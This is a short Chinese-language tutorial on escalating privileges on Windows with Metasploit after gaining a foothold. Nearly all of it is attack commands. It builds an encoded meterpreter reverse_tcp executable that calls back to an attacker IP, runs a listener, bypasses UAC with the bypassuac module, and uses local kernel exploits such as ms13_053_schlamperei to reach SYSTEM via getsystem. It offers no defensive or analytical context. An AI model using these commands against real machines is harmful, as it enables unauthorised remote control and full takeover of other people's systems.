绕过UAC提权，利用漏洞提权

首先建立一个session，进入后渗透测试阶段。

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe  首先生成一个meterpreter类型的payload

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit

---

绕过UAC限制

exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection

什么是UAC(用户账户控制)？，例如：

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set lhost 192.168.80.163

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

meterpreter > getsystem  绕过UAC获取system权限

---

利用windows系统漏洞提权到system

exploit/windows/local/ms13_053_schlamperei

exploit/windows/local/ms13_081_track_popup_menu

exploit/windows/local/ms13_097_ie_registry_symlink

exploit/windows/local/ppr_flatten_rec

msf > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163

msf exploit(ms13_053_schlamperei) > exploit

meterpreter > getsystem  提权到system用户